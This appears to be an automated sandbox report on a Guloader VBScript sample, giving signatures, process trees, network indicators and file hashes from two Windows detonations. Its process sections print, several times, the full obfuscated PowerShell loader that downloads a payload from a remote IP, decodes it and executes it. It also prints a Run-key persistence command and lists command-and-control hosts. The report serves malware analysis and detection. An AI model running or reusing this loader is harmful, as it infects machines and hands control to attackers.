Analysis Overview
SHA256
82b08d87211f44c871d681e216fcd8ae33f485af2f6737011f187c5a56ac8c56
Threat Level: Known bad
The file Reylon.vbs was found to be: Known bad.
Malicious Activity Summary
Guloader,Cloudeye
Blocklisted process makes network request
Checks computer location settings
Checks QEMU agent file
Adds Run key to start application
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-07-12 09:23
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-07-12 09:23
Reported
2023-07-12 09:26
Platform
win7-20230705-en
Max time kernel
148s
Max time network
136s
Command Line
Signatures
Guloader,Cloudeye
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Checks QEMU agent file
| Description | Indicator | Process | Target |
| File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-511725148-388773979-2853099937-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-511725148-388773979-2853099937-1000\Software\Microsoft\Windows\CurrentVersion\Run\Kalibr = "%Della% -w 1 $Exostrad=(Get-ItemProperty -Path 'HKCU:\\Outglari\\').Part;%Della% ($Exostrad)" | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2348 set thread context of 2668 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\internet explorer\ieinstal.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Reylon.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Diskussi9 ([String]$Fibrocysto){For($Apha=1; $Apha -lt $Fibrocysto.Length-1; $Apha+=(1+1)){$Laeserfo=$Laeserfo+$Fibrocysto.Substring($Apha, 1)};$Laeserfo;}$Unconfe=Diskussi9 'Wh t t pB: /V/D1 9 4 . 5L5 .W2 2T4D.M1B8B3D/TmMrKk / SBtoySr t h jteM2 0S. p f m ';$Laeserfo01=Diskussi9 'SiLe xK ';$Egenfinan = Diskussi9 'H\Bs y s waorw 6M4A\KWLi nBd oMwUsUPPoAwAe rSSEhGeFl l \vv 1R. 0 \UpHoewSe rMsBhFeBl lK.IeSx eD ';.($Laeserfo01) (Diskussi9 'G$ OGvIe rR2 =S$ e nMv : wRiDnsd i rA ') ;.($Laeserfo01) (Diskussi9 ' $SE gSe nFfBiFn aDn = $SOSv eIrF2N+I$ E gFe nOf i nja n ') ;.($Laeserfo01) (Diskussi9 'H$FTboLn iae rNgDaPt eu M= (f( gGwEmBiU w iRnR3E2G_SpArBoRcUe sAsu -KFE MP rDo cGe s sDI dc=A$U{VP IHDB}P)U. C oDmPm aPnPdULUiVn eC) -As pFlSi tG V[Dc h aArU]U3R4T ');.($Laeserfo01) (Diskussi9 'V$ F o cvaIlHoA U=K $ETSoKn iSefrEgRaKtMe [M$ATIo n iReQrCgIaGt e .BcSoSu nUtC-M2L] ');.($Laeserfo01) (Diskussi9 'I$CKPa mBm e rHtA=B( THeFsVt -KPIaSt h S$BE gKe n fSiCn aSnC)B - AUn dL A(T[QIPn tAPItCrD]H:R:Rs iUz eE - e qF L8 )B ') ;if ($Kammert) {.$Egenfinan $Focalo;} else {;$Laeserfo00=Diskussi9 'BSRt aGr tC-IBKi tKsET r aBnSsSf eCr -RS o uFr cBe r$cU n c o nRf e -SD e sStMi n aFtSi o nC P$ OSvpeKrs2C ';.($Laeserfo01) (Diskussi9 ' $UORv eRrM2E= $Me nFvP: a pHpIdCaLt aM ') ;.($Laeserfo01) (Diskussi9 'IITm pDoAr tC- Meo dOudlSe RB iStksBT rDaBn s f eFrG ') ;$Over2=$Over2+'\Fattenl.Stu';while (-not $Webs) {.($Laeserfo01) (Diskussi9 'L$BW e bBs =F( TSe s t - PEaHtTh L$GODvOe rK2H)S ') ;.($Laeserfo01) $Laeserfo00;.($Laeserfo01) (Diskussi9 'dSBt a rut - SEl efeEpU 5R ');}.($Laeserfo01) (Diskussi9 ' $ID iTsSk uRs s i S=S MGPeStA- CFoSnSt eHn tB $BORv eLrR2R ');.($Laeserfo01) (Diskussi9 'U$DAFbWiSlTl apgTe b r = P[sS ytsStPePmF.TCPobnBvDe rDt ] :O: F r oCm BRaKsAeS6 4PS tHr i nBgS( $nD iNsEk uOsUsTiP)a ');.($Laeserfo01) (Diskussi9 ' $ L aCe s eBr f oL2 =P [SS yOsAtneLm .STke xRtP.ME njc oBdMiBnSgS] :T: AFSFCFISI .RGCe t S tCr i n g ( $PAFbEi lKl aEg e b rT) ');.($Laeserfo01) (Diskussi9 ' $VNPa t ulrWgK= $kLXaAeUs eCrCfeo 2I. sEu b s tGrWi nEgA( 2Z1 0T8B3D1F,L1L9S0 6T2 ) ');.($Laeserfo01) $Naturg;}"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Diskussi9 ([String]$Fibrocysto){For($Apha=1; $Apha -lt $Fibrocysto.Length-1; $Apha+=(1+1)){$Laeserfo=$Laeserfo+$Fibrocysto.Substring($Apha, 1)};$Laeserfo;}$Unconfe=Diskussi9 'Wh t t pB: /V/D1 9 4 . 5L5 .W2 2T4D.M1B8B3D/TmMrKk / SBtoySr t h jteM2 0S. p f m ';$Laeserfo01=Diskussi9 'SiLe xK ';$Egenfinan = Diskussi9 'H\Bs y s waorw 6M4A\KWLi nBd oMwUsUPPoAwAe rSSEhGeFl l \vv 1R. 0 \UpHoewSe rMsBhFeBl lK.IeSx eD ';.($Laeserfo01) (Diskussi9 'G$ OGvIe rR2 =S$ e nMv : wRiDnsd i rA ') ;.($Laeserfo01) (Diskussi9 ' $SE gSe nFfBiFn aDn = $SOSv eIrF2N+I$ E gFe nOf i nja n ') ;.($Laeserfo01) (Diskussi9 'H$FTboLn iae rNgDaPt eu M= (f( gGwEmBiU w iRnR3E2G_SpArBoRcUe sAsu -KFE MP rDo cGe s sDI dc=A$U{VP IHDB}P)U. C oDmPm aPnPdULUiVn eC) -As pFlSi tG V[Dc h aArU]U3R4T ');.($Laeserfo01) (Diskussi9 'V$ F o cvaIlHoA U=K $ETSoKn iSefrEgRaKtMe [M$ATIo n iReQrCgIaGt e .BcSoSu nUtC-M2L] ');.($Laeserfo01) (Diskussi9 'I$CKPa mBm e rHtA=B( THeFsVt -KPIaSt h S$BE gKe n fSiCn aSnC)B - AUn dL A(T[QIPn tAPItCrD]H:R:Rs iUz eE - e qF L8 )B ') ;if ($Kammert) {.$Egenfinan $Focalo;} else {;$Laeserfo00=Diskussi9 'BSRt aGr tC-IBKi tKsET r aBnSsSf eCr -RS o uFr cBe r$cU n c o nRf e -SD e sStMi n aFtSi o nC P$ OSvpeKrs2C ';.($Laeserfo01) (Diskussi9 ' $UORv eRrM2E= $Me nFvP: a pHpIdCaLt aM ') ;.($Laeserfo01) (Diskussi9 'IITm pDoAr tC- Meo dOudlSe RB iStksBT rDaBn s f eFrG ') ;$Over2=$Over2+'\Fattenl.Stu';while (-not $Webs) {.($Laeserfo01) (Diskussi9 'L$BW e bBs =F( TSe s t - PEaHtTh L$GODvOe rK2H)S ') ;.($Laeserfo01) $Laeserfo00;.($Laeserfo01) (Diskussi9 'dSBt a rut - SEl efeEpU 5R ');}.($Laeserfo01) (Diskussi9 ' $ID iTsSk uRs s i S=S MGPeStA- CFoSnSt eHn tB $BORv eLrR2R ');.($Laeserfo01) (Diskussi9 'U$DAFbWiSlTl apgTe b r = P[sS ytsStPePmF.TCPobnBvDe rDt ] :O: F r oCm BRaKsAeS6 4PS tHr i nBgS( $nD iNsEk uOsUsTiP)a ');.($Laeserfo01) (Diskussi9 ' $ L aCe s eBr f oL2 =P [SS yOsAtneLm .STke xRtP.ME njc oBdMiBnSgS] :T: AFSFCFISI .RGCe t S tCr i n g ( $PAFbEi lKl aEg e b rT) ');.($Laeserfo01) (Diskussi9 ' $VNPa t ulrWgK= $kLXaAeUs eCrCfeo 2I. sEu b s tGrWi nEgA( 2Z1 0T8B3D1F,L1L9S0 6T2 ) ');.($Laeserfo01) $Naturg;}"
C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
Network
| Country | Destination | Domain | Proto |
| TR | 194.55.224.183:80 | 194.55.224.183 | tcp |
| TR | 194.55.224.183:80 | 194.55.224.183 | tcp |
| TR | 194.55.224.183:80 | 194.55.224.183 | tcp |
| US | 8.8.8.8:53 | top.abuse1disabled.xyz | udp |
| NL | 134.19.179.139:5631 | top.abuse1disabled.xyz | tcp |
| US | 8.8.8.8:53 | sub.abuse2disabled.xyz | udp |
| US | 199.249.230.37:5631 | sub.abuse2disabled.xyz | tcp |
| DE | 38.242.234.206:5631 | tcp | |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Cab765B.tmp
| MD5 | 3ac860860707baaf32469fa7cc7c0192 |
| SHA1 | c33c2acdaba0e6fa41fd2f00f186804722477639 |
| SHA256 | d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904 |
| SHA512 | d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c |
memory/564-74-0x00000000026E0000-0x0000000002760000-memory.dmp
memory/564-75-0x000000001B420000-0x000000001B702000-memory.dmp
memory/564-76-0x0000000001F40000-0x0000000001F48000-memory.dmp
memory/564-77-0x00000000026E0000-0x0000000002760000-memory.dmp
memory/564-78-0x00000000026E0000-0x0000000002760000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0S6AHN3HR5DX9LVALPHG.temp
| MD5 | 271ae57e5fe7ec7130268737b82214b5 |
| SHA1 | be8854b23b036dc02c441b7975f0d3c5291f1213 |
| SHA256 | fd950c53f966e28f87c20d132f718a54534709640e4e6a5c79fb5a8ca42a83ac |
| SHA512 | a3f9777fa851e5248cba54dd54ee5456d58abe07cc644ae6df6f7d5fd1a8df150b5eaeda76d128a7b0a9f0801156ac203bfe2808b3aa2d99f0128abea2a7a699 |
memory/2348-82-0x00000000026B0000-0x00000000026F0000-memory.dmp
memory/2348-81-0x00000000026B0000-0x00000000026F0000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 770d8350daae6c7f2b5b25ca43f3522a |
| SHA1 | c96b106e2d7bba04ba7c36458739a8825d42a189 |
| SHA256 | a771ab56702938dc05d65cebb57c6697b5ce152330222abc36775107e131d0ab |
| SHA512 | 421a70e8b4c4ef6182d542c622a5139c820d1bfe58ab8bcc3240f62263cc5c6df16a68319e144930f5320f9cb2e9242d9c60e6ba7b71f4f9ee7f84486c2db084 |
C:\Users\Admin\AppData\Local\Temp\TarBC6E.tmp
| MD5 | 4ff65ad929cd9a367680e0e5b1c08166 |
| SHA1 | c0af0d4396bd1f15c45f39d3b849ba444233b3a2 |
| SHA256 | c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6 |
| SHA512 | f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27 |
memory/564-93-0x00000000026E0000-0x0000000002760000-memory.dmp
memory/564-94-0x00000000026E0000-0x0000000002760000-memory.dmp
memory/564-95-0x00000000026E0000-0x0000000002760000-memory.dmp
memory/2348-97-0x00000000026B0000-0x00000000026F0000-memory.dmp
memory/2348-98-0x00000000026B0000-0x00000000026F0000-memory.dmp
memory/2348-96-0x00000000026B0000-0x00000000026F0000-memory.dmp
memory/2348-99-0x0000000005F60000-0x0000000009927000-memory.dmp
memory/2348-100-0x0000000005010000-0x0000000005011000-memory.dmp
memory/2668-103-0x0000000000C20000-0x00000000045E7000-memory.dmp
memory/2668-104-0x0000000000C20000-0x00000000045E7000-memory.dmp
memory/2668-106-0x0000000000C20000-0x00000000045E7000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-07-12 09:23
Reported
2023-07-12 09:26
Platform
win10v2004-20230703-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Guloader,Cloudeye
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Checks QEMU agent file
| Description | Indicator | Process | Target |
| File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kalibr = "%Della% -w 1 $Exostrad=(Get-ItemProperty -Path 'HKCU:\\Outglari\\').Part;%Della% ($Exostrad)" | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1580 set thread context of 3368 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\internet explorer\ieinstal.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\internet explorer\ieinstal.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Reylon.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Diskussi9 ([String]$Fibrocysto){For($Apha=1; $Apha -lt $Fibrocysto.Length-1; $Apha+=(1+1)){$Laeserfo=$Laeserfo+$Fibrocysto.Substring($Apha, 1)};$Laeserfo;}$Unconfe=Diskussi9 'Wh t t pB: /V/D1 9 4 . 5L5 .W2 2T4D.M1B8B3D/TmMrKk / SBtoySr t h jteM2 0S. p f m ';$Laeserfo01=Diskussi9 'SiLe xK ';$Egenfinan = Diskussi9 'H\Bs y s waorw 6M4A\KWLi nBd oMwUsUPPoAwAe rSSEhGeFl l \vv 1R. 0 \UpHoewSe rMsBhFeBl lK.IeSx eD ';.($Laeserfo01) (Diskussi9 'G$ OGvIe rR2 =S$ e nMv : wRiDnsd i rA ') ;.($Laeserfo01) (Diskussi9 ' $SE gSe nFfBiFn aDn = $SOSv eIrF2N+I$ E gFe nOf i nja n ') ;.($Laeserfo01) (Diskussi9 'H$FTboLn iae rNgDaPt eu M= (f( gGwEmBiU w iRnR3E2G_SpArBoRcUe sAsu -KFE MP rDo cGe s sDI dc=A$U{VP IHDB}P)U. C oDmPm aPnPdULUiVn eC) -As pFlSi tG V[Dc h aArU]U3R4T ');.($Laeserfo01) (Diskussi9 'V$ F o cvaIlHoA U=K $ETSoKn iSefrEgRaKtMe [M$ATIo n iReQrCgIaGt e .BcSoSu nUtC-M2L] ');.($Laeserfo01) (Diskussi9 'I$CKPa mBm e rHtA=B( THeFsVt -KPIaSt h S$BE gKe n fSiCn aSnC)B - AUn dL A(T[QIPn tAPItCrD]H:R:Rs iUz eE - e qF L8 )B ') ;if ($Kammert) {.$Egenfinan $Focalo;} else {;$Laeserfo00=Diskussi9 'BSRt aGr tC-IBKi tKsET r aBnSsSf eCr -RS o uFr cBe r$cU n c o nRf e -SD e sStMi n aFtSi o nC P$ OSvpeKrs2C ';.($Laeserfo01) (Diskussi9 ' $UORv eRrM2E= $Me nFvP: a pHpIdCaLt aM ') ;.($Laeserfo01) (Diskussi9 'IITm pDoAr tC- Meo dOudlSe RB iStksBT rDaBn s f eFrG ') ;$Over2=$Over2+'\Fattenl.Stu';while (-not $Webs) {.($Laeserfo01) (Diskussi9 'L$BW e bBs =F( TSe s t - PEaHtTh L$GODvOe rK2H)S ') ;.($Laeserfo01) $Laeserfo00;.($Laeserfo01) (Diskussi9 'dSBt a rut - SEl efeEpU 5R ');}.($Laeserfo01) (Diskussi9 ' $ID iTsSk uRs s i S=S MGPeStA- CFoSnSt eHn tB $BORv eLrR2R ');.($Laeserfo01) (Diskussi9 'U$DAFbWiSlTl apgTe b r = P[sS ytsStPePmF.TCPobnBvDe rDt ] :O: F r oCm BRaKsAeS6 4PS tHr i nBgS( $nD iNsEk uOsUsTiP)a ');.($Laeserfo01) (Diskussi9 ' $ L aCe s eBr f oL2 =P [SS yOsAtneLm .STke xRtP.ME njc oBdMiBnSgS] :T: AFSFCFISI .RGCe t S tCr i n g ( $PAFbEi lKl aEg e b rT) ');.($Laeserfo01) (Diskussi9 ' $VNPa t ulrWgK= $kLXaAeUs eCrCfeo 2I. sEu b s tGrWi nEgA( 2Z1 0T8B3D1F,L1L9S0 6T2 ) ');.($Laeserfo01) $Naturg;}"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Diskussi9 ([String]$Fibrocysto){For($Apha=1; $Apha -lt $Fibrocysto.Length-1; $Apha+=(1+1)){$Laeserfo=$Laeserfo+$Fibrocysto.Substring($Apha, 1)};$Laeserfo;}$Unconfe=Diskussi9 'Wh t t pB: /V/D1 9 4 . 5L5 .W2 2T4D.M1B8B3D/TmMrKk / SBtoySr t h jteM2 0S. p f m ';$Laeserfo01=Diskussi9 'SiLe xK ';$Egenfinan = Diskussi9 'H\Bs y s waorw 6M4A\KWLi nBd oMwUsUPPoAwAe rSSEhGeFl l \vv 1R. 0 \UpHoewSe rMsBhFeBl lK.IeSx eD ';.($Laeserfo01) (Diskussi9 'G$ OGvIe rR2 =S$ e nMv : wRiDnsd i rA ') ;.($Laeserfo01) (Diskussi9 ' $SE gSe nFfBiFn aDn = $SOSv eIrF2N+I$ E gFe nOf i nja n ') ;.($Laeserfo01) (Diskussi9 'H$FTboLn iae rNgDaPt eu M= (f( gGwEmBiU w iRnR3E2G_SpArBoRcUe sAsu -KFE MP rDo cGe s sDI dc=A$U{VP IHDB}P)U. C oDmPm aPnPdULUiVn eC) -As pFlSi tG V[Dc h aArU]U3R4T ');.($Laeserfo01) (Diskussi9 'V$ F o cvaIlHoA U=K $ETSoKn iSefrEgRaKtMe [M$ATIo n iReQrCgIaGt e .BcSoSu nUtC-M2L] ');.($Laeserfo01) (Diskussi9 'I$CKPa mBm e rHtA=B( THeFsVt -KPIaSt h S$BE gKe n fSiCn aSnC)B - AUn dL A(T[QIPn tAPItCrD]H:R:Rs iUz eE - e qF L8 )B ') ;if ($Kammert) {.$Egenfinan $Focalo;} else {;$Laeserfo00=Diskussi9 'BSRt aGr tC-IBKi tKsET r aBnSsSf eCr -RS o uFr cBe r$cU n c o nRf e -SD e sStMi n aFtSi o nC P$ OSvpeKrs2C ';.($Laeserfo01) (Diskussi9 ' $UORv eRrM2E= $Me nFvP: a pHpIdCaLt aM ') ;.($Laeserfo01) (Diskussi9 'IITm pDoAr tC- Meo dOudlSe RB iStksBT rDaBn s f eFrG ') ;$Over2=$Over2+'\Fattenl.Stu';while (-not $Webs) {.($Laeserfo01) (Diskussi9 'L$BW e bBs =F( TSe s t - PEaHtTh L$GODvOe rK2H)S ') ;.($Laeserfo01) $Laeserfo00;.($Laeserfo01) (Diskussi9 'dSBt a rut - SEl efeEpU 5R ');}.($Laeserfo01) (Diskussi9 ' $ID iTsSk uRs s i S=S MGPeStA- CFoSnSt eHn tB $BORv eLrR2R ');.($Laeserfo01) (Diskussi9 'U$DAFbWiSlTl apgTe b r = P[sS ytsStPePmF.TCPobnBvDe rDt ] :O: F r oCm BRaKsAeS6 4PS tHr i nBgS( $nD iNsEk uOsUsTiP)a ');.($Laeserfo01) (Diskussi9 ' $ L aCe s eBr f oL2 =P [SS yOsAtneLm .STke xRtP.ME njc oBdMiBnSgS] :T: AFSFCFISI .RGCe t S tCr i n g ( $PAFbEi lKl aEg e b rT) ');.($Laeserfo01) (Diskussi9 ' $VNPa t ulrWgK= $kLXaAeUs eCrCfeo 2I. sEu b s tGrWi nEgA( 2Z1 0T8B3D1F,L1L9S0 6T2 ) ');.($Laeserfo01) $Naturg;}"
C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.81.21.72.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.233.44.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.121.18.2.in-addr.arpa | udp |
| TR | 194.55.224.183:80 | 194.55.224.183 | tcp |
| US | 8.8.8.8:53 | 183.224.55.194.in-addr.arpa | udp |
| TR | 194.55.224.183:80 | 194.55.224.183 | tcp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.131.241.8.in-addr.arpa | udp |
| TR | 194.55.224.183:80 | 194.55.224.183 | tcp |
| US | 8.8.8.8:53 | top.abuse1disabled.xyz | udp |
| NL | 134.19.179.139:5631 | top.abuse1disabled.xyz | tcp |
| US | 8.8.8.8:53 | sub.abuse2disabled.xyz | udp |
| US | 199.249.230.37:5631 | sub.abuse2disabled.xyz | tcp |
| DE | 38.242.234.206:5631 | tcp | |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 206.234.242.38.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp |
Files
memory/3396-142-0x000001F1C1E80000-0x000001F1C1EA2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_byf0oizh.rtb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3396-147-0x000001F1A99F0000-0x000001F1A9A00000-memory.dmp
memory/3396-148-0x000001F1A99F0000-0x000001F1A9A00000-memory.dmp
memory/3396-149-0x000001F1A99F0000-0x000001F1A9A00000-memory.dmp
memory/1580-150-0x0000000002D00000-0x0000000002D36000-memory.dmp
memory/1580-151-0x0000000002D40000-0x0000000002D50000-memory.dmp
memory/1580-152-0x00000000056F0000-0x0000000005D18000-memory.dmp
memory/1580-153-0x0000000005D70000-0x0000000005D92000-memory.dmp
memory/1580-154-0x0000000005E20000-0x0000000005E86000-memory.dmp
memory/1580-155-0x0000000005E90000-0x0000000005EF6000-memory.dmp
memory/1580-165-0x0000000002D40000-0x0000000002D50000-memory.dmp
memory/1580-166-0x0000000006600000-0x000000000661E000-memory.dmp
memory/1580-167-0x0000000002D40000-0x0000000002D50000-memory.dmp
memory/1580-168-0x0000000007E50000-0x00000000084CA000-memory.dmp
memory/1580-169-0x0000000006BB0000-0x0000000006BCA000-memory.dmp
memory/1580-170-0x00000000078A0000-0x0000000007936000-memory.dmp
memory/1580-171-0x0000000007800000-0x0000000007822000-memory.dmp
memory/1580-172-0x0000000008A80000-0x0000000009024000-memory.dmp
memory/1580-173-0x0000000007C30000-0x0000000007C44000-memory.dmp
memory/3396-174-0x000001F1A99F0000-0x000001F1A9A00000-memory.dmp
memory/3396-175-0x000001F1A99F0000-0x000001F1A9A00000-memory.dmp
memory/3396-176-0x000001F1A99F0000-0x000001F1A9A00000-memory.dmp
memory/1580-177-0x0000000002D40000-0x0000000002D50000-memory.dmp
memory/1580-178-0x0000000002D40000-0x0000000002D50000-memory.dmp
memory/1580-179-0x0000000002D40000-0x0000000002D50000-memory.dmp
memory/1580-181-0x0000000007CD0000-0x0000000007CD1000-memory.dmp
memory/1580-182-0x0000000009030000-0x000000000C9F7000-memory.dmp
memory/3368-183-0x0000000001000000-0x00000000049C7000-memory.dmp
memory/3368-184-0x0000000001000000-0x00000000049C7000-memory.dmp
memory/3368-186-0x0000000001000000-0x00000000049C7000-memory.dmp